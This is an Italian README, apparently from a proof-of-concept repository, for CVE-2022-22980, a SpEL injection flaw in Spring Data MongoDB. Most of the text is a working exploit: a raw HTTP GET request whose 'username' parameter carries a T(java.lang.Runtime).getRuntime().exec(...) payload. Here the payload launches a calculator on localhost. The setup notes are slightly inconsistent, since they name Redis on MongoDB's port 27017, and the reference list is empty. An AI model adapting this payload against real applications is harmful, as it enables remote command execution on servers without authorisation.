
Exploit proof-of-concept per CVE-2022-22980, una vulnerabilità di esecuzione remota di codice in Spring Data MongoDB tramite iniezione SpEL nel parametro username.
Vulnerabilità di poco conto, solo una nota.
Avvia Redis, porta 27017
Avvia il progetto, Spring Boot sulla porta 6666


GET /v1/user/get?username=T(java.lang.Runtime).getRuntime().exec('open+-a+calculator.app') HTTP/1.1
Host: localhost:6666
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 2
Riferimenti: